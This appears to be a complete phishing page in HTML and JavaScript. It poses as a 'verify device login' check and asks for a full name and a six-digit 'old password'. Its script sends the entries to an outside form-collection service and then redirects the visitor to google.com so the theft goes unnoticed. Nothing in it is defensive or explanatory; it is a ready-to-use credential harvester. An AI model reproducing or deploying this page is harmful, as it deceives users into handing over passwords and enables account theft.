<!DOCTYPE>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>start</title>
    <style>
        *{
    margin: 0;
    padding: 0;
    box-sizing: border-box;
   font-family: 'Poppins', sans-serif;
}
.container{
    width: 100%;
    height: 100vh;
    background: #fff;
    display: flex;
    align-items: center;
    justify-content: center;
}

.container form{
    width: 100%;
    max-width: 500px;
    padding: 50px 30px 20px;
    background: whitesmoke;
    border-radius: 4px;
    position: relative;
}
    h1 {
    font-size: 20px;
    color: #0f2027;
    text-align: center;
}
.input-group{
    flex-direction: column;
    width: 100%;
    display: flex;
    margin: 10px 0;
    position: relative;
}
.input-group label{
    flex-basis: 28%;
    margin-right: 10px;
}
.input-group input, .input-group textarea{
    border: 2px solid #f0f0f0;
	border-radius: 4px;
	display: block;
	padding: 10px;
	width: 100%;
}
.input-group input:focus {
    outline: 0;
    }
::placeholder{
    font-size: 17px;
}

form button{
  width: 100%;
    background: #26C28A;
    color: #fff;
    border-radius: 5px;
    border: 1px solid rgba(255, 255, 255, 0.7);
    padding: 10px 40px;
    outline: 0;
    cursor: pointer;
    display: block;
    margin: 30px auto 10px;
}
.input-group span {
    position: absolute;
    bottom: 12px;
    right: 17px;
    font-size: 15px;
    color: red;
}
.input-group span i{
    color: #26C28A;
    margin-bottom: 2px;
}
.i{
    color: #26C28A;
    margin-bottom: 2px;
}
</style>
</head>
<body>
  <div class="container">
     <form id="my-form" action="https://formspree.io/f/mrgvzvbq" method="POST">
         <h1>verify device login</h1>
      <div class="input-group">
        <label>Full name</label>
        <input type="text" placeholder="enter full name" name="full name" required>
        <span id="name-error"></span>
      </div>

      <div class="input-group">
        <label>6-digits old Password</label>
        <input type="number" placeholder="  * * * * * *" id="contact-phone" onkeyup="validatePhone()" name="old password">
                <span id="phone-error"></span>
      </div>

    <button onclick="validateForm()">verify</button>
    <span id="my-form-status"></span>
  </form>
  
  </div>
  <script>
      var phoneError = document.getElementById('phone-error');
      var submitError = document.getElementById('submit-error');
      
 function validatePhone(){
     var phone = document.getElementById('contact-phone').value;
     if (phone === '')    {
            phoneError.innerHTML = 'enter old Password ';
        return false;
     } 
    if (phone.length < 6)      {
       phoneError.innerHTML = 'enter 6-digits password';
        return false;
    }
    if (phone.length > 6)      {
     phoneError.innerHTML = 'incorrect<br>(6-digits)';
        return false;
      }
     phoneError.innerHTML = '<p class="i">&#10004</p>';
        return true;
 }
function validateForm(){
   if (!validatePhone()){
   event.preventDefault();
        return false;
    }
    else if(validatePhone()){
        return true;
        }
}
var form = document.getElementById("my-form");
    
    async function handleSubmit(event) {
      event.preventDefault();
      var status = document.getElementById("my-form-status");
      var data = new FormData(event.target);
      fetch(event.target.action, {
        method: form.method,
        body: data,
        headers: {
            'Accept': 'application/json'
        }
      }).then(response => {
        if (response.ok) {
    window.location.assign("https://www.google.com");
          status.innerHTML = "successful";
          form.reset()
        } else {
          response.json().then(data => {
            if (Object.hasOwn(data, 'errors')) {
              status.innerHTML = data["errors"].map(error => error["message"]).join(", ")
            } else {
              status.innerHTML = "check network connection"
            }
          })
        }
      }).catch(error => {
        status.innerHTML = "check network connection"
      });
    }
    form.addEventListener("submit", handleSubmit)
  </script>
</body>
</html>
